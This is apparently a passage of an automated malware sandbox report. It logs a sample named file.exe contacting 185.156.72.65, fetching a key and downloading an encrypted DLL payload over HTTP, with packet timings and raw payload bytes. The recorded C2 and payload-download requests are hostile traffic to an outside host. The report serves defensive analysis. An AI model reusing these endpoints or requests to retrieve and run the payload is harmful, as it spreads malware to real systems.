                                                      Nov 30, 2024 05:35:57.413635015 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.413702965 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.413829088 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.414474010 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.414521933 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.414580107 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.414621115 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.415349960 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.415399075 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.415436029 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.415479898 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.416209936 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.416279078 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.416316032 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.416359901 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.417102098 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.417171001 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.417213917 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.418072939 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.418128967 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.418190956 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.418277025 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.418816090 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.419014931 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.419068098 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.419068098 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.419687986 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.419791937 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.419843912 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.420550108 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.420654058 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.420706987 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.421425104 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.421524048 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.421600103 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.422302008 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.422348022 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.422379017 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.423158884 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.423208952 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.423230886 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.424042940 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.424093008 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.424129009 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.424170971 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.424901009 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.425043106 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.425087929 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.425790071 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.425839901 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.425889969 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.426053047 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.426647902 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.426743984 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.426759005 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.426790953 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.427527905 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.427602053 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.427634001 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.427674055 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.428389072 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.428476095 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.428528070 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.856410027 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.856422901 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.856508017 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857109070 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857161999 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857198954 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857213020 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857223988 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857254982 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857256889 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857275963 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857300997 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857904911 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857918978 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857930899 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857954979 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857966900 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857973099 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.857981920 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.857992887 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858006001 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858027935 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.858047962 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.858758926 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858772993 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858784914 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858809948 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.858838081 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.858841896 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858895063 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858906984 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858917952 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858931065 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858939886 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.858943939 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.858967066 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.858978987 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.859842062 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859882116 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859894037 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.859898090 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859910011 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859922886 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859925032 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.859934092 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.859958887 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.859960079 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859973907 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859987020 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.859997988 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860009909 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860017061 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860029936 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860049963 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860825062 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860837936 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860850096 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860862017 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860873938 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860883951 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860888004 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860901117 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860908985 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860922098 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860937119 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860945940 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860949993 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860963106 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860975981 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.860976934 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.860987902 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.861011982 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.861018896 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.861704111 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.861717939 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.861728907 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.861757994 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.861783981 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.861802101 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.861820936 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.861831903 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.861861944 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.861886978 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.862160921 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862176895 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862195015 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862206936 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862217903 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862221956 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.862238884 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862247944 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.862253904 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862262964 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.862267017 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862278938 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862292051 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862293959 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.862303972 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.862318993 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.862334967 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863217115 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863229990 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863241911 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863255024 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863266945 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863276005 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863276958 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863291979 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863295078 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863305092 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863322020 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863327980 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863332033 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863344908 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863356113 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.863356113 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863367081 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863385916 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.863403082 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864183903 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864196062 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864207983 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864221096 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864232063 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864232063 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864244938 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864257097 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864263058 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864270926 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864280939 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864284039 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864296913 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864298105 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864310026 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.864327908 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864362955 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.864993095 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865041971 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.865128040 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865140915 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865153074 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865165949 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865175962 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.865176916 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865190983 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865201950 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865216017 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.865226984 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865236998 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.865240097 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865253925 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.865261078 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.865283966 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.865308046 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866039991 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866053104 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866065979 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866076946 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866087914 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866089106 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866101027 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866101027 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866134882 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866162062 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866450071 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866461992 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866532087 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866563082 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866575956 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866586924 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866599083 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866610050 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.866616011 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866641998 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.866669893 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.867589951 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.867603064 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.867613077 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.867626905 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.867638111 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.867649078 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.867655993 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.867666006 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.867685080 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.867706060 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.868504047 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868516922 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868540049 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868551970 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868565083 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868576050 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868582010 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.868582010 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.868590117 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868593931 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.868602991 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868616104 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868617058 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.868627071 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.868645906 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.868665934 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:35:57.869426966 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:35:57.869474888 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:36:00.907191992 CET8049707185.156.72.65192.168.2.7
                                                      Nov 30, 2024 05:36:00.907257080 CET4970780192.168.2.7185.156.72.65
                                                      Nov 30, 2024 05:36:27.345478058 CET4970780192.168.2.7185.156.72.65
                                                      • 185.156.72.65
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749707185.156.72.65804708C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 05:35:19.097501993 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:20.556236029 CET204INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:20 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:20.998572111 CET388OUTGET /dll/key HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:21.544759035 CET224INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:21 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 21
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                      Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                      Nov 30, 2024 05:35:21.551738977 CET393OUTGET /dll/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:22.278312922 CET1236INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:21 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                      Content-Length: 97296
                                                      Keep-Alive: timeout=5, max=98
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                      Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                      Nov 30, 2024 05:35:22.278393984 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
